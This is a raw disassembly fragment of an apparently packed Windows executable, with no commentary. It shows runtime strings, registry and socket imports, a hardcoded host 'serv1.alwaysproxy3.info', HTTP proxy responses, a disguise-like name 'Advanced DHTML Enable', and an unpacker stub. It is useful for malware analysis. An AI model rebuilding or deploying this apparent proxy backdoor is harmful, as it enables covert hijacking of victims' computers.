dword_4080B4 dd 889Eh dword_4080B8 dd 88BAh dword_4080BC dd 88D4h dword_4080C0 dd 88EEh ; sub_4052DA+AB�r ...
dword_4080C4 dd 8904h ; sub_404B26+E1�r
dword_4080C8 dd 891Ch dword_4080CC dd 8936h dword_4080D0 dd 8948h ; sub_404E3C+143�r
dword_4080D4 dd 8958h ; sub_404C58+166�r
dd 0
dword_4080DC dd 80000073h dword_4080E0 dd 80000014h dword_4080E4 dd 80000003h dword_4080E8 dd 80000010h dword_4080EC dd 80000013h dword_4080F0 dd 8000000Dh dword_4080F4 dd 80000001h dword_4080F8 dd 80000017h dword_4080FC dd 8000000Ch dword_408100 dd 80000004h dword_408104 dd 8000006Fh dword_408108 dd 80000009h dword_40810C dd 80000002h dword_408110 dd 80000012h dword_408114 dd 80000097h dword_408118 dd 8000000Ah dword_40811C dd 80000034h dd 0
byte_408124 db 0 ; DATA XREF: sub_403D8C+4A�r
align 4
dword_408128 dd 0FFFFFFFFh, 402829h, 402836h, 0dword_408138 dd 0FFFFFFFFh, 402FB7h, 402FCBhbyte_408144 db 6 ; DATA XREF: sub_403D8C:loc_403DE3�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
dd 60686008h, 606060h, 78707000h, 8787878h, 807h, 8080007h
dd 8000008h, 7000800h, 8
aNull: ; DATA XREF: .data:off_409104�o
unicode 0, <(null)>,0
align 10h
aNull_0 db '(null)',0 ; DATA XREF: .data:off_409100�o
align 4
aRuntimeError db 'runtime error ',0
align 4
db 0Dh,0Ah,0
align 4
aTlossError db 'TLOSS error',0Dh,0Ah,0
align 4
aSingError db 'SING error',0Dh,0Ah,0
align 4
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 10h
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_4093B4�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_404E3C+119�o
align 4
asc_40846C db 0Ah ; DATA XREF: sub_404E3C+F1�o
db 0Ah,0
align 10h
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_404E3C+D3�o
db 0Ah
db 'Program: ',0
align 4
a___ db '...',0 ; DATA XREF: sub_404E3C+BF�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_404E3C+7D�o
align 4
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 10h
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 4
aTz db 'TZ',0 ; DATA XREF: sub_4052DA+A�o
align 4
dword_4084EC dd 0 ; sub_406CE8+57�o ...
dword_4084F0 dd 2 dup(0) ; sub_406CE8+36�o ...
dword_4084F8 dd 0FFFFFFFFh, 405E5Eh, 405E62haGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_4066F5+3D�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_4066F5+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_4066F5+24�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_4066F5+D�o
align 10h
dword_408540 dd 0FFFFFFFFh, 406DF8h, 406DFCh, 0FFFFFFFFh, 406EACh, 406EB0h
; DATA XREF: sub_406CE8+5�o
dword_408558 dd 0FFFFFFFFh, 407248h, 40724Ch, 0FFFFFFFFh, 4072B7h, 4072BBh
; DATA XREF: sub_407091+5�o
dd 869Ch, 2 dup(0)
dd 400000h, 80DCh, 85CCh, 2 dup(0)
dd 873Eh, 800Ch, 85C0h, 2 dup(0)
dd 876Eh, 8000h, 5 dup(0)
dd 874Ch, 875Eh, 0
dd 8A56h, 8A42h, 8A32h, 8A22h, 8A12h, 8A02h, 89F0h, 89E4h
dd 89DAh, 89CEh, 8A68h, 89AAh, 8994h, 8982h, 8972h, 8966h
dd 86F0h, 86F8h, 8702h, 8718h, 8728h, 8A7Ah, 89BCh, 8810h
dd 877Ch, 8788h, 8796h, 87AAh, 87BEh, 87D8h, 87E8h, 87F8h
dd 8804h, 8A94h, 8824h, 8836h, 8848h, 8856h, 8864h, 8872h
dd 8880h, 8890h, 889Eh, 88BAh, 88D4h, 88EEh, 8904h, 891Ch
dd 8936h, 8948h, 8958h, 0
dd 80000073h, 80000014h, 80000003h, 80000010h, 80000013h
dd 8000000Dh, 80000001h, 80000017h, 8000000Ch, 80000004h
dd 8000006Fh, 80000009h, 80000002h, 80000012h, 80000097h
dd 8000000Ah, 80000034h, 0
dd 434F5357h, 2E32334Bh, 6C6C64h, 6C530349h, 706565h, 6957038Ah
dd 6578456Eh, 1750063h
aGetmodulefilen db 'GetModuleFileNameA',0
align 4
aI db 'i',0
aCreatethread db 'CreateThread',0
align 4
db 3Bh ; ;
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcessId',0
aKernel32_dll db 'KERNEL32.dll',0
align 4
dd 655201F9h, 74655367h, 756C6156h, 41784565h, 1E20000h
dd 4F676552h, 4B6E6570h, 78457965h, 44410041h, 49504156h
dd 642E3233h, 6C6Ch, 65480206h, 6C417061h, 636F6Ch, 784500AFh
dd 72507469h, 7365636Fh, 3510073h, 6D726554h, 74616E69h
dd 6F725065h, 73736563h, 13A0000h
aGetcurrentproc db 'GetCurrentProcess',0
dw 1D8h
aGettimezoneinf db 'GetTimeZoneInformation',0
align 4
dd 654701BEh, 73795374h, 546D6574h, 656D69h, 6547016Bh
dd 636F4C74h, 69546C61h, 656Dh, 6548020Ch, 72467061h, 6565h
dd 745202CCh, 776E556Ch, 646E69h, 65470177h, 646F4D74h
dd 48656C75h, 6C646E61h, 4165h, 654701AFh, 61745374h, 70757472h
dd 6F666E49h, 1080041h, 43746547h, 616D6D6Fh, 694C646Eh
dd 41656Eh, 654701DEh, 72655674h, 6E6F6973h, 20A0000h
dd 70616548h, 74736544h, 796F72h, 65480208h, 72437061h
dd 65746165h, 3780000h, 74726956h, 466C6175h, 656572h
dd 69560375h, 61757472h, 6C6C416Ch, 636Fh, 65480210h, 65527061h
dd 6F6C6C41h, 3620063h
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 2
aA db 'í',0
aFreeenvironmen db 'FreeEnvironmentStringsA',0
aU db 'î',0
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
dw 389h
aWidechartomult db 'WideCharToMultiByte',0
db 4Dh ; M
db 1, 47h, 65h
aTenvironmentst db 'tEnvironmentStrings',0
db 4Fh ; O
db 1, 47h, 65h
aTenvironment_0 db 'tEnvironmentStringsW',0
align 2
dw 319h
aSethandlecount db 'SetHandleCount',0
align 4
db 0B1h ; ±
db 1, 47h, 65h
aTstdhandle db 'tStdHandle',0
align 4
db 5Eh ; ^
db 1, 47h, 65h
aTfiletype db 'tFileType',0
dw 397h
aWritefile db 'WriteFile',0
dw 169h
aGetlasterror db 'GetLastError',0
align 2
dw 310h
aSetfilepointer db 'SetFilePointer',0
align 4
db 6Bh ; k
db 2, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
dw 1B2h
aGetstringtypea db 'GetStringTypeA',0
align 4
dd 654701B5h, 72745374h, 54676E69h, 57657079h, 0FC0000h
dd 43746547h, 666E4950h, 0F5006Fh, 41746547h, 5043h, 6547018Bh
dd 4D454F74h, 5043h, 65470198h, 6F725074h, 64644163h, 73736572h
dd 2480000h, 64616F4Ch, 7262694Ch, 41797261h, 32C0000h
dd 53746553h, 61486474h, 656C646Eh, 23A0000h, 614D434Ch
dd 72745370h, 41676E69h, 23B0000h, 614D434Ch, 72745370h
dd 57676E69h, 0E50000h, 73756C46h, 6C694668h, 66754265h
dd 73726566h, 340000h, 706D6F43h, 53657261h, 6E697274h
dd 4167h, 6F430035h, 7261706Dh, 72745365h, 57676E69h, 3080000h
aSetenvironment db 'SetEnvironmentVariableA',0
a_ db '.',0
aClosehandle db 'CloseHandle',0
align 4
dd 157h dup(0)
dword_409000 dd 0 dword_409004 dd 0 dword_409008 dd 0 dd offset sub_405AD5
dd offset sub_4062B4
dword_409014 dd 0 dword_409018 dd 0 dd offset sub_405B7A
dword_409020 dd 0 dword_409024 dd 0 dword_409028 dd 2 dup(0) dword_409030 dd 6425h aServ1_alwayspr db 'serv1.alwaysproxy3.info',0 ; DATA XREF: sub_4016E0+17�o
aHttp1_0201Unab db 'HTTP/1.0 201 Unable to connect',0Dh,0Ah ; DATA XREF: sub_4017F0+F35�o
db 0Dh,0Ah,0
align 10h
aHttp1_0200Conn db 'HTTP/1.0 200 Connection established',0Dh,0Ah
; DATA XREF: sub_4017F0+E7A�o
db 0Dh,0Ah,0
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_4017F0+B3E�o
; sub_4017F0+CB5�o
aHttp db 'http://',0 ; DATA XREF: sub_4017F0+5AB�o
aAdvancedDhtmlE db 'Advanced DHTML Enable',0 ; DATA XREF: sub_4017F0+1C3�o
align 10h
dword_4090D0 dd 1 align 10h
dword_4090E0 dd 19930520h, 3 dup(0) ; sub_402DE6+2�o
off_4090F0 dd offset sub_402978 ; DATA XREF: sub_402FD6+1C�r
dword_4090F4 dd 2 ; sub_404E3C+46�r ...
dd 10h
dword_4090FC dd 3F8h ; sub_406A9F+27�r ...
off_409100 dd offset aNull_0 ; DATA XREF: sub_403D8C:loc_4040F0�r
; sub_403D8C+457�r
; "(null)"
off_409104 dd offset aNull ; DATA XREF: sub_403D8C+259�r
; "(null)"
off_409108 dd offset word_409112 ; DATA XREF: sub_402BE9+23�r
; sub_402BE9:loc_402C4A�r ...
dd offset word_409112
db 2 dup(0)
word_409112 dw 20h ; DATA XREF: sub_405EBF+18�r
; .data:off_409108�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_409314 dd 1 ; sub_402BE9:loc_402C35�r ...
dd 2Eh, 1
dword_409320 dd 0C0000005h ; sub_404785+11�o
dd 0Bh, 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_409398 dd 3 dword_40939C dd 7 dword_4093A0 dd 0Ah dword_4093A4 dd 8Ch ; sub_404644+8F�w ...
dword_4093A8 dd 0FFFFFFFFh, 0A00hdword_4093B0 dd 2 ; sub_404E3C+28�r
off_4093B4 dd offset aR6002FloatingP ; DATA XREF: sub_404E3C+FC�r
; sub_404E3C+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 4083F0h, 9, 4083C4h, 0Ah, 4083A0h, 10h, 408374h
dd 11h, 408344h, 12h, 408320h, 13h, 4082F4h, 18h, 4082BCh
dd 19h, 408294h, 1Ah, 40825Ch, 1Bh, 408224h, 1Ch, 4081FCh
dd 78h, 4081ECh, 79h, 4081DCh, 7Ah, 4081CCh, 0FCh, 4081C8h
dd 0FFh, 4081B8h
dword_409440 dd 7080h ; sub_404E3C+1B�o ...
dword_409444 dd 1 ; sub_4052DA+8B�w ...
dword_409448 dd 0FFFFF1F0h ; sub_4052DA+94�w ...
dword_40944C dd 545350h, 0Fh dup(0)dword_40948C dd 544450h, 0Fh dup(0)off_4094CC dd offset dword_40944C ; DATA XREF: sub_4052DA+BA�r
; sub_4052DA+D9�r ...
off_4094D0 dd offset dword_40948C ; DATA XREF: sub_4052DA+F4�r
; sub_4052DA+11B�r ...
align 8
dword_4094D8 dd 0FFFFFFFFh ; sub_405538+1E�r ...
dword_4094DC dd 0 ; sub_4056E4+BF�w
dword_4094E0 dd 0 ; sub_4056E4+E0�w
align 8
dword_4094E8 dd 0FFFFFFFFh ; sub_405538+26�r ...
dword_4094EC dd 0 ; sub_4056E4+EA�w ...
dword_4094F0 dd 0 ; sub_4056E4+23�r ...
dword_4094F4 dd 0FFFFFFFFh dd 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h, 111h, 130h
dd 14Eh
dword_409524 dd 16Dh ; sub_4056E4+2E�r ...
dword_409528 dd 0FFFFFFFFh dd 1Eh, 3Ah, 59h, 77h, 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh
dd 14Dh, 16Ch, 0
off_409560 dd offset dword_5174E0 ; DATA XREF: sub_405AD5+55�o
align 8
dd offset dword_5174E0
dd 101h
dword_409570 dd 2 dup(0) dd 1000h, 0
dword_409580 dd 3 dup(0) dd 2, 1, 3 dup(0)
dword_4095A0 dd 3 dup(0) dd 2 dup(2), 7 dup(0)
dword_4095D0 dd 84h dup(0) off_4097E0 dd offset sub_406C81 ; DATA XREF: sub_403D8C+3AA�r
; sub_405AD5+69�o
off_4097E4 dd offset sub_406C81 ; DATA XREF: sub_403D8C+3E2�r
dd offset sub_406C81
off_4097EC dd offset sub_406C81 ; DATA XREF: sub_403D8C+3CB�r
dd offset sub_406C81
dd offset sub_406C81
align 10h
byte_409800 db 1 ; DATA XREF: sub_405EF0+E1�r
db 2, 4, 8
align 8
dword_409808 dd 3A4h dword_40980C dd 82798260h, 21h, 0dword_409818 dd 0DFA6h align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_4098F8 dd 2 dup(0) dword_409900 dd 1 dword_409904 dd 16h dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
dword_409A68 dd 3 dup(0) dword_409A74 dd 0 ; sub_4013E0+19�w ...
dd 0
dword_409A7C dd 0 dword_409A80 dd 0 ; sub_4012A0+EC�w ...
dword_409A84 dd 0 ; sub_4058BE+11B�w ...
dd 0
dword_409A8C dd 0 dword_409A90 dd 0 dword_409A94 dd 0 dword_409A98 dd 0 dword_409A9C dd 0 dword_409AA0 dd 0 align 8
dword_409AA8 dd 0 ; sub_406904+9�r ...
dword_409AAC dd 0 dword_409AB0 dd 0 ; sub_406F76+4�r ...
align 8
dword_409AB8 dd 0 align 10h
byte_409AC0 db 0 ; DATA XREF: sub_402989+2D�w
; sub_405B7A+5�r
align 4
dword_409AC4 dd 0 dword_409AC8 dd 0 ; sub_402989+8B�w
align 10h
dword_409AD0 dd 0 ; sub_402A3C+A4�w
align 8
word_409AD8 dw 0 ; DATA XREF: sub_402A3C+55�r
; sub_402A3C+9A�o
word_409ADA dw 0 ; DATA XREF: sub_402A3C+48�r
db 2 dup(0)
word_409ADE dw 0 ; DATA XREF: sub_402A3C+3B�r
word_409AE0 dw 0 ; DATA XREF: sub_402A3C+2E�r
word_409AE2 dw 0 ; DATA XREF: sub_402A3C+21�r
align 8
dword_409AE8 dd 0 ; sub_404820:loc_404832�r ...
align 10h
dword_409AF0 dd 0 dword_409AF4 dd 0 ; sub_406A9F:loc_406AF0�r ...
dword_409AF8 dd 0 dword_409AFC dd 0 ; sub_404644+46�w ...
dword_409B00 dd 41h dup(0) dword_409C04 dd 0 ; sub_404B26+23�w ...
dword_409C08 dd 0 align 10h
dword_409C10 dd 0 ; sub_4052DA+63�w ...
align 8
dword_409C18 dd 0 ; sub_4052DA+46�r
dword_409C1C dd 10h dup(0) word_409C5C dw 0 ; DATA XREF: sub_405538+A8�r
word_409C5E dw 0 ; DATA XREF: sub_4052DA+54�r
; sub_405538+DB�r ...
word_409C60 dw 0 ; DATA XREF: sub_405538+CA�r
word_409C62 dw 0 ; DATA XREF: sub_405538+D3�r
; sub_405538:loc_40562A�r
word_409C64 dw 0 ; DATA XREF: sub_405538+C0�r
word_409C66 dw 0 ; DATA XREF: sub_405538+B8�r
word_409C68 dw 0 ; DATA XREF: sub_405538+B0�r
word_409C6A dw 0 ; DATA XREF: sub_405538+9E�r
dword_409C6C dd 0 dword_409C70 dd 10h dup(0) word_409CB0 dw 0 ; DATA XREF: sub_405538+46�r
word_409CB2 dw 0 ; DATA XREF: sub_4052DA:loc_405351�r
; sub_405538+78�r ...
word_409CB4 dw 0 ; DATA XREF: sub_405538+67�r
word_409CB6 dw 0 ; DATA XREF: sub_405538+70�r
; sub_405538:loc_4055BC�r
word_409CB8 dw 0 ; DATA XREF: sub_405538+5D�r
word_409CBA dw 0 ; DATA XREF: sub_405538+55�r
word_409CBC dw 0 ; DATA XREF: sub_405538+4D�r
word_409CBE dw 0 ; DATA XREF: sub_405538+3E�r
dword_409CC0 dd 0 dword_409CC4 dd 0 ; sub_4052DA:loc_405426�r ...
dword_409CC8 dd 0 dword_409CCC dd 0 dword_409CD0 dd 0 ; sub_405D65:loc_405DCF�w
dword_409CD4 dd 0 ; sub_406089+4�w ...
dword_409CD8 dd 0 ; resolved to->USER32.MessageBoxA ; sub_4066F5+2E�w ...
dword_409CDC dd 0 ; resolved to->USER32.GetActiveWindow ; sub_4066F5:loc_406744�r
dword_409CE0 dd 0 ; resolved to->USER32.GetLastActivePopup ; sub_4066F5+60�r
dd 2 dup(0)
dword_409CEC dd 0 ; sub_405D65+7B�r
dd 3 dup(0)
dword_409CFC dd 0 ; sub_4052DA+101�r ...
dd 0
dword_409D04 dd 0 ; sub_406CE8+4C�w ...
dword_409D08 dd 0 ; sub_407091+48�w ...
word_409D0C dw 0 ; DATA XREF: sub_4016E0+2F�r
; sub_4017F0+237�w ...
align 10h
dd 4 dup(0)
dword_409D20 dd 0 ; sub_4017F0+217�o ...
dword_409D24 dd 0 ; sub_4017F0+A93�w ...
dword_409D28 dd 0 ; sub_4017F0+38D�r ...
align 10h
dword_409D30 dd 0 dword_409D34 dd 0 ; sub_4017F0+A01�w ...
dword_409D38 dd 0 ; sub_4017F0+405�r ...
dword_409D3C dd 0 ; sub_4017F0:loc_401C5E�r
dword_409D40 dd 0 ; sub_4017F0+EBB�r
dd 5 dup(0)
dword_409D58 dd 0 ; sub_4017F0+44C�r ...
dd 4353Fh dup(0)
dword_517258 dd 2 dup(0) dword_517260 dd 2 dup(0) ; sub_4017F0+20B�o ...
dword_517268 dd 0 ; sub_4017F0+365�r
dd 0Ch dup(0)
dword_51729C dd 0 ; sub_405EF0+65�w ...
dword_5172A0 dd 3 dup(0) ; sub_405EF0+171�o ...
dword_5172AC dd 0 ; sub_405EF0+15D�w ...
dd 4 dup(0)
byte_5172C0 db 0 ; DATA XREF: sub_40612F:loc_40623B�w
; sub_40612F:loc_406258�w ...
align 4
dd 3Fh dup(0)
byte_5173C0 db 0 ; DATA XREF: sub_405EF0+5C�o
; sub_405EF0+AF�o ...
byte_5173C1 db 0 ; DATA XREF: sub_404972+3F�r
; sub_404972+84�r ...
align 4
dd 40h dup(0)
dword_5174C4 dd 0 ; sub_405EF0+12B�w ...
dword_5174C8 dd 0 ; sub_405AD5+41�w ...
dd 5 dup(0)
dword_5174E0 dd 400h dup(0) ; .data:00409568�o
dword_5184E0 dd 0 ; sub_405AD5:loc_405AEF�w ...
dd 7 dup(0)
dword_518500 dd 0 ; sub_404C58:loc_404C78�w ...
dword_518504 dd 3Fh dup(0) dword_518600 dd 0 ; sub_404C58:loc_404CE2�r ...
dword_518604 dd 0 ; sub_403713+5�r ...
dword_518608 dd 0 ; sub_4030DF+259�r ...
dword_51860C dd 0 ; sub_4030DF+310�w ...
dword_518610 dd 0 ; sub_4030DF+22C�r ...
dword_518614 dd 0 ; sub_4030B4�r ...
dword_518618 dd 0 ; sub_4030B4+8�r ...
dword_51861C dd 0 ; sub_402B18+21�r ...
dword_518620 dd 0 ; sub_4047C8+F�r ...
dword_518624 dd 0 ; sub_406904�r
dword_518628 dd 0 dword_51862C dd 0 dword_518630 dd 0 ; sub_402989+57�r
dword_518634 dd 0 dd 272h dup(0)
; =============== S U B R O U T I N E =======================================
sub_519000 proc near ; DATA XREF: .data:00519514�o
var_4 = dword ptr -4
pusha
call $+5
pop ebp
sub ebp, 6
cmp byte ptr [ebp+53Eh], 1
jz loc_51925F
mov byte ptr [ebp+53Eh], 1
mov eax, ebp
sub eax, [ebp+54Bh]
mov [ebp+514h], ebp
mov [ebp+58Bh], eax
mov eax, [ebp+58Bh]
add eax, [ebp+56Fh]
mov [ebp+543h], eax
cmp byte ptr [ebp+53Ch], 1
jnz short loc_519069
mov ebx, [ebp+567h]
add ebx, [ebp+58Bh]
mov [ebp+567h], ebx
mov eax, [ebx]
xchg eax, [ebp+573h]
mov [ebx], eax
loc_519069: ; CODE XREF: sub_519000+4B�j
push 4
push 1000h
push dword ptr [ebp+55Fh]
push 0
call sub_51951C
or eax, eax
jz loc_5192CA
mov [ebp+563h], eax
mov esi, [ebp+55Bh]
add esi, ebp
loc_519093: ; CODE XREF: sub_519000+AA�j
; sub_519000+118�j
lodsd
or eax, eax
jz loc_51911D
mov edi, eax
add edi, [ebp+58Bh]
lodsd
mov ecx, eax
lodsd
or eax, eax
jz short loc_519093
push esi
push edi
mov esi, edi
mov edi, [ebp+563h]
rep movsb
pop edi
push edi
push edi
push dword ptr [ebp+563h]
call sub_51934F
add esp, 8
pop edi
sub eax, 5
xor ecx, ecx
push edx
push ebx
xor edx, edx
clc
jnb short loc_51910E
loc_5190D6: ; CODE XREF: sub_519000+F1�j
; sub_519000+FD�j ...
dec eax
jz short loc_51910E
js short loc_51910E
mov bx, [ecx+edi]
cmp bl, 0E8h
jz short loc_5190F3
cmp bl, 0E9h
jz short loc_5190F3
cmp bx, 25FFh
jz short loc_5190FF
inc ecx
jmp short loc_5190D6
; ---------------------------------------------------------------------------
loc_5190F3: ; CODE XREF: sub_519000+E2�j
; sub_519000+E7�j
sub [ecx+edi+1], ecx
add ecx, 5
sub eax, 4
jmp short loc_5190D6
; ---------------------------------------------------------------------------
loc_5190FF: ; CODE XREF: sub_519000+EE�j
sub [ecx+edi+2], edx
add ecx, 6
sub edx, 4
sub eax, 5
jmp short loc_5190D6
; ---------------------------------------------------------------------------
loc_51910E: ; CODE XREF: sub_519000+D4�j
; sub_519000+D7�j ...
mov byte ptr [ebp+0D3h], 0F8h
pop ebx
pop edx
pop esi
jmp loc_519093
; ---------------------------------------------------------------------------
loc_51911D: ; CODE XREF: sub_519000+96�j
push 4
push dword ptr [ebp+55Fh]
push dword ptr [ebp+563h]
call sub_519522
cmp byte ptr [ebp+53Ch], 1
jnz short loc_519147
mov ebx, [ebp+567h]
mov eax, [ebp+573h]
mov [ebx], eax
loc_519147: ; CODE XREF: sub_519000+137�j
mov eax, [ebp+543h]
mov [ebp+53Fh], eax
mov edx, [ebp+543h]
sub edx, [ebp+53Fh]
add edx, [ebp+58Bh]
mov [ebp+547h], edx
mov esi, [ebp+56Bh]
or esi, esi
jz short loc_5191A8
add esi, [ebp+58Bh]
add esi, 10h
mov edx, [ebp+543h]
sub edx, [ebp+587h]
or edx, edx
jz short loc_519193
call sub_5192F3
loc_519193: ; CODE XREF: sub_519000+18C�j
mov edx, [ebp+58Bh]
sub edx, [ebp+58Fh]
or edx, edx
jz short loc_5191A8
call sub_5192F3
loc_5191A8: ; CODE XREF: sub_519000+173�j
; sub_519000+1A1�j
mov ecx, [ebp+58Bh]
mov edx, [ebp+543h]
loc_5191B4: ; CODE XREF: sub_519000+25A�j
mov eax, [edx+0Ch]
or eax, eax
jz loc_51925F
mov [edx+0Ch], ecx
add eax, [ebp+547h]
push edx
push ecx
push eax
push eax
mov [ebp+553h], eax
mov ebx, eax
call sub_519528
pop ebx
pop ecx
pop edx
or eax, eax
jnz short loc_5191F2
push edx
push ecx
push ebx
call sub_51952E
or eax, eax
jz loc_519272
pop ecx
pop edx
loc_5191F2: ; CODE XREF: sub_519000+1DE�j
mov [ebp+239h], eax
mov esi, [edx]
mov [edx], ecx
mov edi, [edx+10h]
mov [edx+10h], ecx
or esi, esi
jnz short loc_519208
mov esi, edi
loc_519208: ; CODE XREF: sub_519000+204�j
add esi, [ebp+547h]
add edi, [ebp+547h]
loc_519214: ; CODE XREF: sub_519000+255�j
mov eax, [esi]
or eax, eax
jz short loc_519257
mov [esi], ecx
jns short loc_519223
movzx eax, ax
jmp short loc_519230
; ---------------------------------------------------------------------------
loc_519223: ; CODE XREF: sub_519000+21C�j
add eax, [ebp+547h]
mov word ptr [eax], 0
inc eax
inc eax
loc_519230: ; CODE XREF: sub_519000+221�j
push eax
push edx
push esi
push edi
push ecx
push ebx
push eax
push eax
push 12345678h
call sub_519534
pop ebx
or eax, eax
jz short loc_519294
pop ebx
pop ecx
pop edi
mov [edi], eax
pop esi
pop edx
pop ebx
add esi, 4
add edi, 4
jmp short loc_519214
; ---------------------------------------------------------------------------
loc_519257: ; CODE XREF: sub_519000+218�j
add edx, 14h
jmp loc_5191B4
; ---------------------------------------------------------------------------
loc_51925F: ; CODE XREF: sub_519000+11�j
; sub_519000+1B9�j
mov eax, [ebp+557h]
add eax, [ebp+58Bh]
mov [esp+20h+var_4], eax
popa
jmp eax
; ---------------------------------------------------------------------------
loc_519272: ; CODE XREF: sub_519000+1EA�j
lea eax, [ebp+5CEh]
push eax
lea edi, [ebp+4D1h]
push ebx
push edi
push eax
call dword ptr [ebp+5B9h]
add esp, 0Ch
pop eax
lea ebx, [ebp+49Dh]
jmp short loc_5192D8
; ---------------------------------------------------------------------------
loc_519294: ; CODE XREF: sub_519000+245�j
lea edi, [ebp+4F6h]
test ebx, 0FFFF0000h
jz short loc_5192A8
lea edi, [ebp+4E3h]
loc_5192A8: ; CODE XREF: sub_519000+2A0�j
lea eax, [ebp+5CEh]
push eax
push dword ptr [ebp+553h]
push ebx
push edi
push eax
call dword ptr [ebp+5B9h]
add esp, 10h
pop eax
lea ebx, [ebp+49Dh]
jmp short loc_5192D8
; ---------------------------------------------------------------------------
loc_5192CA: ; CODE XREF: sub_519000+7F�j
lea eax, [ebp+4B7h]
lea ebx, [ebp+487h]
jmp short $+2
loc_5192D8: ; CODE XREF: sub_519000+292�j
; sub_519000+2C8�j
push 0FFFFFFFFh
push 0FFFFFFFFh
mov edx, [ebp+5ADh]
mov ecx, [ebp+5B5h]
xor ebp, ebp
push 30h
push ebx
push eax
push 0
push edx
jmp ecx
sub_519000 endp
; =============== S U B R O U T I N E =======================================
sub_5192F3 proc near ; CODE XREF: sub_519000+18E�p
; sub_519000+1A3�p
lodsd
or eax, eax
jz short locret_51934E
mov ebx, eax
add ebx, [ebp+58Bh]
add [ebx], edx
loc_519302: ; CODE XREF: sub_5192F3+2A�j
; sub_5192F3+59�j
lodsb
mov [esi-1], dl
movzx eax, al
or al, al
jz short locret_51934E
cmp al, 1
jz short loc_51931F
cmp al, 2
jz short loc_519326
cmp al, 3
jz short loc_519329
loc_519319: ; CODE XREF: sub_5192F3+31�j
; sub_5192F3+34�j
add ebx, eax
add [ebx], edx
jmp short loc_519302
; ---------------------------------------------------------------------------
loc_51931F: ; CODE XREF: sub_5192F3+1C�j
lodsw
movzx eax, ax
jmp short loc_519319
; ---------------------------------------------------------------------------
loc_519326: ; CODE XREF: sub_5192F3+20�j
lodsd
jmp short loc_519319
; ---------------------------------------------------------------------------
